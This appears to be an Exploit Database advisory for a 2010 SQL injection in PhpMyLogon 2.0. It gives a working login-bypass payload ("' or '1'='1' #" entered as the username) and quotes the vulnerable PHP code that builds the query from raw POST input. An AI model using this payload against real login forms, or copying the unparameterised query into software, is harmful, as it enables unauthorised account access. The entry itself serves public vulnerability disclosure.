ad

PhpMyLogon 2.0 - SQL Injection Vulnerability



EDB-ID: 11737 CVE: 2010-0970 OSVDB-ID: 63045
Author: blake Published: 2010-03-14 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
# Exploit Title: PhpMyLogon SQL Injection
# Date: March 14, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
# Version: 2
# Tested on: Windows XP SP3


Proof of Concept:
Enter the following for the username to login as the first user:
blake'  or '1'='1' #
and anything for the password.

Vulnerable Code:
        if(isset($_POST['submit'])) {
            if($_POST['username'] != "" AND $_POST['password'] != "") {
                // Check submitted data with data in database
                $sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";
                $query = mysql_query($sql);